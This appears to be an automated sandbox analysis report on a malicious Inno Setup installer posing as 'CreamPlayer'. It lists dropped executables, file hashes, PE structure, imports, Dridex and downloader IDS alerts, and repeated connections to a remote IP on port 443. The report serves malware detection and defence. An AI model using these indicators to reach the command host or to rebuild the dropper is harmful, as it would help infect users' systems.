                                                                                                  Malicious:true
                                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:InnoSetup Log CreamPlayer, version 0x30, 4758 bytes, 414408\user, "C:\Users\user\AppData\Local\CreamPlayer 1.12"
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4758
                                                                                                  Entropy (8bit):4.709606584516227
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:Oj4dWD38kpY8Y79g+eOIhe2ga7ICSss/Lni5WJRfwx7O/lxoxxp2:O8dWD3vpYjjHIhe2HICSsAni5iRfwx7I
                                                                                                  MD5:969DDFA64BF4D8287A205613749CEA65
                                                                                                  SHA1:337C2328CDB4C98A856D8C7FF395F8D175F5839F
                                                                                                  SHA-256:7D26A506CCA22E9571B989B9FB8DD6F5DCAEB55410D4044A27371AD8C1054451
                                                                                                  SHA-512:F01520796724D37CCAEF263CEE8029C1FCF9ACB933FF7224017066C4B7BDF66035A932AAF9A44EB4F0F0AF4A6A0CC5610E9B6D417A76E662495121253647A64D
                                                                                                  Malicious:false
                                                                                                  Preview:Inno Setup Uninstall Log (b)....................................CreamPlayer.....................................................................................................................CreamPlayer.....................................................................................................................0...........%................................................................................................................./..........!T.......K....414408.user,C:\Users\user\AppData\Local\CreamPlayer 1.12............. .+.. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):717985
                                                                                                  Entropy (8bit):6.51490048494207
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+NIq5MRxyFi:SPcYn5c/rPx37/zHBA6pFptZ1CE0qMRj
                                                                                                  MD5:56C3FA3352F751693DFC2275199FDE56
                                                                                                  SHA1:0C0D8556192FA79ADCACB4E0750C7310C91822F3
                                                                                                  SHA-256:7ADDEC9CDB89247B9BA11D6BA094C3C857D1D7B08A7FB7335593B9D0CC75E827
                                                                                                  SHA-512:210D4418410F07208EF0DBAE8EA10F6284EA0B8F445BB12CD2B1AF22F48E9FC7D18F21A5F9FCAE997B2BCDB5EE0D371AB59EFE8912C28789F0BF83DE84D5F4F2
                                                                                                  Malicious:true
                                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2560
                                                                                                  Entropy (8bit):2.8818118453929262
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                  MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                  SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                  SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                  SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6144
                                                                                                  Entropy (8bit):4.289297026665552
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                                                  MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                                                  SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                                                  SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                                                  SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23312
                                                                                                  Entropy (8bit):4.596242908851566
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                  MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                  SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                  SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                  SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\bzX2pV3Ybw.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):706560
                                                                                                  Entropy (8bit):6.506367491472476
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+NIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CE0qMRU
                                                                                                  MD5:726BF37850FF846984004440C4875481
                                                                                                  SHA1:38FC5C0BE1FF27378F548A61A299183B2AA690DC
                                                                                                  SHA-256:D63972B415BC36A573543D82E2AEF4EF4C17F2F7C3429DDC94B65A309961BE12
                                                                                                  SHA-512:163B223658B138BFDC169EDE67DD5552421155259360E06FC00016FF6255527F2F658FC5411863BEA90F4C79C861758DCC881164360AD43C9E108DFA10875DD3
                                                                                                  Malicious:true
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.998310567880892
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  File name:bzX2pV3Ybw.exe
                                                                                                  File size:4'096'896 bytes
                                                                                                  MD5:cd6081e11eb60abfa77c3b587726d83f
                                                                                                  SHA1:f1573e60caa0aa5b8a75584f2ec8f14c1ad005bf
                                                                                                  SHA256:efbf1bcbd351efeab32b9279284c5fa064210e2d8e42d896cc065c2d60f6fe49
                                                                                                  SHA512:aa4da89f55a6e13665c5e434e75aaafdf9f82b7a6d9ab3bfaf759ff2751885748cfc7dd3b5d520b20b10c8a4aba6099fe8cd95173622e63dfa30b3ccb6b511a1
                                                                                                  SSDEEP:98304:M45f7IPRVWvpkvi+bul5SFrnWTLSNwUbwP380d60+njcX:L5fPvKiQI8RnI3nd60hX
                                                                                                  TLSH:731633637D286579F88141B09FB8C53B40573A29ADF80E8533C849DFAF7B42BE549B24
                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                  Icon Hash:2d2e3797b32b2b99
                                                                                                  Entrypoint:0x40a5f8
                                                                                                  Entrypoint Section:CODE
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:1
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:1
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:1
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                                  Instruction
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  add esp, FFFFFFC4h
                                                                                                  push ebx
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  xor eax, eax
                                                                                                  mov dword ptr [ebp-10h], eax
                                                                                                  mov dword ptr [ebp-24h], eax
                                                                                                  call 00007FD8CD2A9173h
                                                                                                  call 00007FD8CD2AA37Ah
                                                                                                  call 00007FD8CD2AA609h
                                                                                                  call 00007FD8CD2AA6ACh
                                                                                                  call 00007FD8CD2AC64Bh
                                                                                                  call 00007FD8CD2AEFB6h
                                                                                                  call 00007FD8CD2AF11Dh
                                                                                                  xor eax, eax
                                                                                                  push ebp
                                                                                                  push 0040ACC9h
                                                                                                  push dword ptr fs:[eax]
                                                                                                  mov dword ptr fs:[eax], esp
                                                                                                  xor edx, edx
                                                                                                  push ebp
                                                                                                  push 0040AC92h
                                                                                                  push dword ptr fs:[edx]
                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                  mov eax, dword ptr [0040C014h]
                                                                                                  call 00007FD8CD2AFBCBh
                                                                                                  call 00007FD8CD2AF7B6h
                                                                                                  cmp byte ptr [0040B234h], 00000000h
                                                                                                  je 00007FD8CD2B06AEh
                                                                                                  call 00007FD8CD2AFCC8h
                                                                                                  xor eax, eax
                                                                                                  call 00007FD8CD2A9E69h
                                                                                                  lea edx, dword ptr [ebp-10h]
                                                                                                  xor eax, eax
                                                                                                  call 00007FD8CD2ACC5Bh
                                                                                                  mov edx, dword ptr [ebp-10h]
                                                                                                  mov eax, 0040CE28h
                                                                                                  call 00007FD8CD2A920Ah
                                                                                                  push 00000002h
                                                                                                  push 00000000h
                                                                                                  push 00000001h
                                                                                                  mov ecx, dword ptr [0040CE28h]
                                                                                                  mov dl, 01h
                                                                                                  mov eax, 0040738Ch
                                                                                                  call 00007FD8CD2AD4EAh
                                                                                                  mov dword ptr [0040CE2Ch], eax
                                                                                                  xor edx, edx
                                                                                                  push ebp
                                                                                                  push 0040AC4Ah
                                                                                                  push dword ptr fs:[edx]
                                                                                                  mov dword ptr fs:[edx], esp
                                                                                                  call 00007FD8CD2AFC26h
                                                                                                  mov dword ptr [0040CE34h], eax
                                                                                                  mov eax, dword ptr [0040CE34h]
                                                                                                  cmp dword ptr [eax+0Ch], 00000000h
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x110000x2c000x2c00132cb60f5a9e2cec1ef3174f1a090924False0.3252840909090909data4.490561587242899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                                  RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                                  RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                                  RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                                  RT_STRING0x125740x2f2data0.35543766578249336
                                                                                                  RT_STRING0x128680x30cdata0.3871794871794872
                                                                                                  RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                                  RT_STRING0x12e440x68data0.75
                                                                                                  RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                                  RT_STRING0x12f600xaedata0.5344827586206896
                                                                                                  RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                                  RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                                  RT_VERSION0x1307c0x4f4dataEnglishUnited States0.25709779179810727
                                                                                                  RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                                                  DLLImport
                                                                                                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                                  user32.dllMessageBoxA
                                                                                                  oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                                  kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                                  user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                                  comctl32.dllInitCommonControls
                                                                                                  advapi32.dllAdjustTokenPrivileges
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  DutchNetherlands
                                                                                                  EnglishUnited States
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-12-14T14:08:29.588842+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949844188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:30.291348+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949844188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:35.159950+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949858188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:35.895027+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949858188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:37.467591+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949864188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:38.163965+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949864188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:39.877945+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949873188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:40.572408+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949873188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:42.381332+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949880188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:43.099381+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949880188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:44.699486+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949886188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:45.394193+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949886188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:46.971425+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949892188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:47.666729+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949892188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:49.443045+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949898188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:50.137691+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949898188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:51.908215+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949904188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:52.602609+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949904188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:54.447882+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949910188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:55.148331+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949910188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:56.927354+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949913188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:57.628951+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949913188.119.66.185443TCP
                                                                                                  2024-12-14T14:08:59.449951+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949919188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:00.148989+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949919188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:01.721611+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949925188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:02.419889+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949925188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:04.010229+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949931188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:04.718150+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949931188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:06.325119+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949939188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:07.080336+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949939188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:08.661654+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949946188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:09.360133+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949946188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:11.128945+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949952188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:11.829922+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949952188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:13.599152+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949958188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:14.395279+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949958188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:16.301206+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949966188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:17.032412+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949966188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:18.610269+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949972188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:19.305823+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949972188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:20.892262+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949978188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:21.592309+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949978188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:23.366201+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949984188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:24.084812+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949984188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:25.663334+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949990188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:26.359534+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949990188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:27.945791+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949996188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:28.647792+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949996188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:30.381248+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949999188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:31.084241+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949999188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:32.874192+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950000188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:33.567818+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950000188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:35.176443+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950001188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:35.911468+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950001188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:37.584228+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950002188.119.66.185443TCP
                                                                                                  2024-12-14T14:09:38.363095+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950002188.119.66.185443TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 14, 2024 14:08:27.877279997 CET49844443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:27.877310991 CET44349844188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:27.877393007 CET49844443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:27.928164959 CET49844443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:27.928193092 CET44349844188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:29.588747025 CET44349844188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:29.588841915 CET49844443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:29.642668962 CET49844443192.168.2.9188.119.66.185
                                                                                                  Dec 14, 2024 14:08:29.642692089 CET44349844188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:29.643176079 CET44349844188.119.66.185192.168.2.9
                                                                                                  Dec 14, 2024 14:08:29.643254042 CET49844443192.168.2.9188.119.66.185
